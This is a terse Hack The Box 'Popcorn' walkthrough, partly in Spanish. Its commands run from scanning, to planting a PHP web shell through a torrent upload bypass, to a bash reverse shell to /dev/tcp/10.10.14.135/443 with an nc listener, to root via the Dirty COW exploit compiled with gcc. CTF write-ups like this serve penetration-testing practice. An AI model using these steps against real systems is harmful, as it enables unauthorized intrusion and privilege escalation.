Popcorn

Popcorn


HTB Linux

nmap -A -p- -oA popcorn 10.129.36.23 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA popcorn 10.129.36.23

nmap -sU -O -p- -oA popcorn-udp 10.129.36.23

nikto -h 10.129.36.23:80

gobuster dir -k -u http://10.129.36.23/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

ssh_command.

nmap —script http-enum -p80 10.129.36.23 -oN webscan -Pn

ssh_command.

http://popcorn.htb/test

ssh_command.

ssh_command.

echo “10.129.36.23 popcorn.htb” | sudo tee -a /etc/hosts

ssh_command.

wfuzz -t 200 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://popcorn.htb/FUZZ

ssh_command.

http://popcorn.htb/torrent/upload

ssh_command.

Usamos burpsuite y interceptamos ponemos filename cmd.php

ssh_command.

Tratamos de editar el archivo que subimos

ssh_command.

Subimos un archivo cuando editamos

ssh_command.

Usamos burpsuite y interceptamos ponemos filename cmd.php

Y ponemos el codigo " . shell_exec($_REQUEST['cmd']) . "";?>

ssh_command.

http://popcorn.htb/torrent/upload/

Y encontramos el archivo php

ssh_command.

http://popcorn.htb/torrent/upload/892…php?cmd=whoami

ssh_command.

http://popcorn.htb/torrent/upload/892…php?cmd=bash -c “bash -i >%26 /dev/tcp/10.10.14.135/443 0>%261 ”

nc -lvnp 443

ssh_command.

Adquirimos el flag

ssh_command.

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

find -perm -4000 2>/dev/null

ssh_command.

uname -a

lsb_release -a

ssh_command.

cd tmp

vim exploit.c

https://www.exploit-db.com/exploits/40839

gcc -pthread exploit.c -o dirty -lcrypt

./dirty

ssh_command.

© 2025 Cu3rv0x